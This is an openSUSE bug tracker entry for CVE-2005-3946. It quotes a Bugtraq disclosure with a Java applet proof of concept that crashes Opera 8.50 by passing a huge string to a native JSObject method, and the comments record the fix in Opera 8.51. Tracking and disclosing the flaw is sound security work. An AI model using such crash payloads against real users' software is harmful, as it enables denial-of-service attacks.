Bug 136255

Summary: VUL-0: opera: can be crashed with java-applet due to bug in native routines
Product: [openSUSE] SUSE Linux 10.1
Reporter: Thomas Biege <thomas>
Component: Other
Assignee: Lukas Tinkl <ltinkl>
Status: RESOLVED FIXED
QA Contact: E-mail List <qa-bugs>
Severity: Normal
Priority: P5 - None
CC: patch-request, security-team
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
Whiteboard: CVE-2005-3946: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
Found By: Other
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Description Thomas Biege 2005-12-01 08:29:08 UTC
Hello Lukas,
we have another one.

Date: Wed, 30 Nov 2005 00:31:29 +0100
From: Marc Schoenefeld <marc.schoenefeld@gmx.org>
User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716)
To: Bugtraq <bugtraq@securityfocus.com>
Subject: Opera 8.50 DoS with simple java applet
Envelope-To: tom@electric-sheep.org

Hi y'all,

it is possible to crash the Opera 8.50 browser with a simple
Java applet (see below).
This was observed on Win32; Linux versions may be affected, too.
This can be tested only at:

http://www.illegalaccess.org/exploit/opera85/OperaApplet.html

As you can see the applet crashes at 0x67c0a54c. This is
caused by a bug in a JNI routine implementing the com.opera.JSObject class.
It cannot be ruled out that this bug is exploitable.

The Opera guys were informed on the 21st of September, and
then again on the 8th of October.

Please upgrade to the new Opera 8.51, which does not expose this
weakness.

Sincerely
Marc Schönefeld
marc@illegalaccess.org


>import java.applet.Applet;
>import java.awt.Graphics;
>
>import netscape.javascript.JSObject;
>
>public class OperaTest extends Applet {
>    static {
>        System.out.println("Loaded 1.2");
>    }
>
>    public void paint(Graphics g) {
>        System.out.println("start");
>        try {
>            // Obtain the browser's JSObject for the applet's window; under
>            // Opera this is the native-backed com.opera.JSObject class.
>            netscape.javascript.JSObject jso = JSObject.getWindow(this);
>            System.out.println(jso.getClass());
>            com.opera.JSObject j = (com.opera.JSObject) jso;
>            // Build a one-million-character string ...
>            char[] x = new char[1000000];
>            for (int y = 0; y < x.length; y++) {
>                x[y] = 'A';
>            }
>            String z = new String(x);
>            System.out.println("after evalb");
>            // ... and hand it to the JNI-implemented removeMember, which
>            // crashes Opera 8.50 (fixed in 8.51).
>            j.removeMember(z);
>            System.out.println("after remove");
>        }
>        catch (Exception e) {
>            e.printStackTrace();
>        }
>    }
>}
Comment 1 Marcus Meissner 2005-12-01 10:38:03 UTC
CVE-2005-3946

Opera 8.50 allows remote attackers to cause a denial of service (crash) via a Java applet with a large string argument to the removeMember JNI method for the com.opera.JSObject class.
Comment 2 Lukas Tinkl 2005-12-01 12:31:35 UTC
Will be fixed shortly by #134905
Comment 3 Lukas Tinkl 2005-12-01 17:09:49 UTC
As 8.51 reportedly fixed the problem, the bug is solved; Bug 134905 has been resolved already
Comment 4 Thomas Biege 2009-10-13 20:41:01 UTC
CVE-2005-3946: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)